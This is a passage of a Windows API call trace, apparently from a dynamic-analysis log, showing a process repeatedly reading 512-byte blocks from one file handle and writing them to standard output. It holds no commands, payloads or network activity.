(_FileHandle=1) returned 0x50 [0133.679] GetFileType (hFile=0x50) returned 0x1 [0133.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.679] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.679] GetFileType (hFile=0x50) returned 0x1 [0133.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.679] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.679] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.679] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.679] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.679] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] GetFileType (hFile=0x50) returned 0x1 [0133.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.680] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.681] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.681] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] GetFileType (hFile=0x50) returned 0x1 [0133.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.681] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] GetFileType (hFile=0x50) returned 0x1 [0133.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.682] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.682] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.683] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.683] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType (hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType (hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType (hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType (hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] GetFileType (hFile=0x50) returned 0x1 [0133.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.683] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.684] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.684] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] GetFileType (hFile=0x50) returned 0x1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.684] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.685] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.686] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.686] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] GetFileType (hFile=0x50) returned 0x1 [0133.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.686] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.687] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.687] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] GetFileType (hFile=0x50) returned 0x1 [0133.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.687] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] GetFileType (hFile=0x50) returned 0x1 [0133.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.688] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.689] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee1b4 | out: lpNewFilePointer=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.689] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] WriteFile (in: hFile=0x50, lpBuffer=0x2eefe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] WriteFile (in: hFile=0x50, lpBuffer=0x2ef034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef034*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] WriteFile (in: hFile=0x50, lpBuffer=0x2ef084*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef084*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] WriteFile (in: hFile=0x50, lpBuffer=0x2ef0d4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d4*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.689] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, lpBuffer=0x2ef124*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef124*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, lpBuffer=0x2ef174*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef174*, lpNumberOfBytesWritten=0x2ee1c8*=0x50, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] GetFileType (hFile=0x50) returned 0x1 [0133.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0133.690] WriteFile (in: hFile=0x50, lpBuffer=0x2ef1c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee1c8, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c4*, lpNumberOfBytesWritten=0x2ee1c8*=0x20, lpOverlapped=0x0) returned 1 [0133.690] _get_osfhandle (_FileHandle=4) returned 0x58 [0133.690] SetFilePointerEx (in: 